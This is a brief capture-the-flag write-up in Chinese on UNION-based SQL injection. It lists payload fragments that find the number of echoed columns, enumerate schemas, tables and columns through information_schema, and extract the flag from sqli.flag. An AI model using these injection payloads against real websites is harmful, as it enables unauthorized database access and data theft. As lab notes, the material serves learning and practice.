1.通过union select 确定回显有几列
得知有两列
2.查询flag所在数据库
group_concat(schema_name) from information_schema.schemata
猜测为 sqli
3.查询flag所在表
group_concat(table_name) from information_schema.tables where table_schema='sqli'
4.查询flag所在列
group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
5.查询flag
select group_concat(columnName) from SchemaName.TableName
group_concat(flag) from sqli.flag
